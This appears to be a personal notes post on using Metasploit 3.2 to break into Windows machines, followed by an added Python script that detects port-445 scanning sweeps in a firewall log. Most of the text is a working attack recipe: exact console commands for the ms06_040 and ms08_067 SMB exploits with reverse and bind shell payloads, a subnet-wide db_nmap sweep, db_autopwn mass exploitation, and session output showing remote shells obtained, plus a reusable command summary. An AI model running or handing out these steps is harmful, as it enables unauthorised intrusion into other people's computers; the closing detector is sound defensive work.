Metasploit is an attack tool. I used it for a while some time ago and found it very powerful, so here are my notes.
Attack method (against a Windows 2000 vulnerability):
1. use exploit/windows/smb/ms06_040_netapi
2. set PAYLOAD windows/shell_reverse_tcp
3. set RHOST 192.168.0.161
4. set LHOST 192.168.0.160
5. exploit
The usual, conventional attack procedure, however, should look like this:
From MSF 3.0 onward, vulnerability detection can be automated; both checking a single server and checking for a single vulnerability are fairly simple.
First, checking a single server, using MSF 3.2 as the example:
Start by downloading MSF 3.2. The official download address is http://spool.metasploit.com/releases/framework-3.2.exe
This is the Windows build; to install, just keep clicking Next. MSF 3.2 bundles Nmap. When installation finishes it prompts for an automatic update, and once the update completes MSF 3.2 starts on its own, as in Figure 1:
(Figure 1)
Click Windows, then Console (shortcut Ctrl+O), and Figure 2 appears:
(Figure 2)
Enter the following in order:
load db_sqlite3
Output:
· Successfully loaded plugin: db_sqlite3
db_create
Output:
· Creating a new database instance...
· Successfully connected to the database
· File: C:/Documents and Settings/Administrator/Application Data/.msf3/sqlite3.db
MSF uses an SQLite3 database as its primary store; at this point the database has been created.
db_nmap XXX.XXX.XXX.XXX (or enter a domain name)
PS: if it reports that Nmap cannot be found ([-] The nmap executable could not be found), close MSF 3.2 first, run the ZNMAP shortcut on the desktop, then reopen MSF 3.2. During the scan an Nmap DOS window pops up; just wait patiently.
When the scan finishes, see Figure 3.
(Figure 3)
Then enter db_autopwn -t -p -e -x -r to exploit automatically.
Here is the db_autopwn option list; the ones that matter most are -t, -x, -p, -e, -r and -b.
Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disable exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
Wait patiently; when it finishes, enter sessions -l -v. If a vulnerability was exploited, MSF shows:
msf > sessions -l -v
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.xxx.xxx:17513 -> 192.168.xxx.129:1043 windows/smb/ms06_040_netapi
2 Command shell 192.168.xxx.xxx:5804 -> 192.168.xxx.129:1044 windows/smb/ms08_067_netapi
Then enter sessions -i 1
Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
That covers the intrusion of a single host. Next, automatically attacking one specific vulnerability. I saw a similar post online and am borrowing that author's results, using the ms08_067 vulnerability as the example, without screenshots.
———————————————————————————————————————
msf > load db_sqlite3
· Successfully loaded plugin: db_sqlite3
Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:
msf > db_create
· The specified database already exists, connecting
· Successfully connected to the database
· File: /root/.msf3/sqlite3.db
To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:
msf > db_autopwn -e -p -b -m ms08_067
Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86
msf > sessions -i 1
Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
PS: you can even select a broader set of exploit modules, for example db_autopwn -e -p -b -m windows, which tests every Windows exploit module. This is not recommended: the scan volume is large and problems are likely (for example several shells on one host, with shells that die easily). Only consider it if no vulnerability turns up otherwise.
——————————————————————————————————————
The content between the divider lines is reposted.
PS: the commands needed, in order, are:
load db_sqlite3
db_create
db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
db_autopwn -e -p -b -m ms08_067
To target a different port or vulnerability, just change the port after nmap and the vulnerability after -m.
Here is a foreign vulnerability disclosure site for study and discussion: http://www.milw0rm.com/
But how do you add an exploit to MSF 3.2? It seems 3.2 auto-updates its exploits, but how do you add a new one?
Why does the automated attack not yield a shell? Is it because the vulnerabilities are all patched, or because of how it was operated?
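As an added example (not from the original post, and not Metasploit code), here is a small Python detector for the pattern that the db_nmap -sS -PS445 -p445 sweep above leaves in a firewall connection log: one source sending SYNs to port 445 on many distinct hosts within a short window. The log format, the addresses and the thresholds are constructed assumptions for this example.

```python
"""Added example: flag a port-445 SMB sweep (one source, many distinct targets,
short window) in a simple firewall connection log.  Log format, addresses and
thresholds are constructed for this example, not taken from the post."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# Constructed log format: "<ISO timestamp> SRC=<ip> DST=<ip> DPT=<port> FLAGS=<tcp flags>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) DPT=(?P<dpt>\d+) FLAGS=(?P<flags>\S+)$"
)


def build_sample_log():
    """Construct sample lines: one host sweeping a /24 on 445 plus benign traffic."""
    base = datetime(2009, 3, 1, 10, 0, 0)
    lines = []
    # Sweeping host 10.0.0.5 probes 40 neighbours within 20 seconds (constructed).
    for i in range(1, 41):
        ts = base + timedelta(milliseconds=500 * i)
        lines.append(f"{ts.isoformat()} SRC=10.0.0.5 DST=10.0.0.{i} DPT=445 FLAGS=S")
    # Benign workstation 10.0.0.77 mounting shares on two file servers.
    for i, dst in enumerate(("10.0.0.200", "10.0.0.201")):
        ts = base + timedelta(seconds=30 + i)
        lines.append(f"{ts.isoformat()} SRC=10.0.0.77 DST={dst} DPT=445 FLAGS=S")
    # Unrelated HTTP traffic and a malformed line; both must be ignored.
    lines.append(f"{(base + timedelta(seconds=3)).isoformat()} SRC=10.0.0.9 DST=10.0.0.1 DPT=80 FLAGS=S")
    lines.append("this line is not in the expected format")
    return lines


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "src": m["src"],
        "dst": m["dst"],
        "dport": int(m["dpt"]),
        "flags": m["flags"],
    }


def detect_smb_sweeps(lines, window=timedelta(seconds=60), threshold=10, port=445):
    """Return {source: peak distinct targets} for every source that sent SYNs to
    `port` on at least `threshold` distinct hosts within any `window`."""
    probes = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        # Only SYN probes to the SMB port count; everything else is noise here.
        if ev is None or ev["dport"] != port or "S" not in ev["flags"]:
            continue
        probes[ev["src"]].append((ev["ts"], ev["dst"]))

    alerts = {}
    for src, events in probes.items():
        events.sort()  # the sliding window needs time order
        recent = deque()
        peak = 0
        for ts, dst in events:
            recent.append((ts, dst))
            # Drop probes that fell out of the window.
            while ts - recent[0][0] > window:
                recent.popleft()
            peak = max(peak, len({d for _, d in recent}))
        if peak >= threshold:
            alerts[src] = peak
    return alerts


if __name__ == "__main__":
    for src, n in detect_smb_sweeps(build_sample_log()).items():
        print(f"possible SMB sweep from {src}: {n} distinct hosts on 445 within 60s")
```

Two tuning points: an authorised vulnerability scanner or management server produces exactly this pattern, so its addresses need an allow list rather than a lower threshold; and a sweep spread over longer than the window slips under the per-window count, so in practice it is paired with a second count over a longer window (hours) that tolerates a lower rate.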